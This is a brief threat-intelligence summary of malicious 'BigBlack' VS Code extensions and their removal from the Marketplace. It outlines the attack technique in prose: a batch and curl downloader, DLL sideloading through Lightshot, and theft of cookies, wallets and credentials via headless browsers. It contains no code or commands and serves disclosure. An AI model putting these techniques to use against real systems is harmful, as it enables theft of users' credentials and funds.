Overview
- Koi Security identified the Bitcoin Black and Codo AI extensions on the VS Code Marketplace under the 'BigBlack' publisher as malicious.
- Microsoft’s removal records show BigBlack.bitcoin-black was taken down on December 5 and BigBlack.codo-ai on December 8, with a third BigBlack package also removed for malware.
- The extensions delivered a legitimate Lightshot executable that sideloaded a rogue DLL via DLL hijacking after shifting from a visible PowerShell downloader to a hidden batch and curl chain.
- Stolen data included screenshots, Wi‑Fi credentials, clipboard contents, installed apps, running processes, cryptocurrency wallets, and browser cookies taken by launching Chrome and Edge in headless mode and storing loot in an Evelyn folder.
- VirusTotal detections covered 29 of 72 engines for the malicious DLL, install counts were in the tens, and separate Socket research flagged additional malicious packages across Go, npm, and Rust.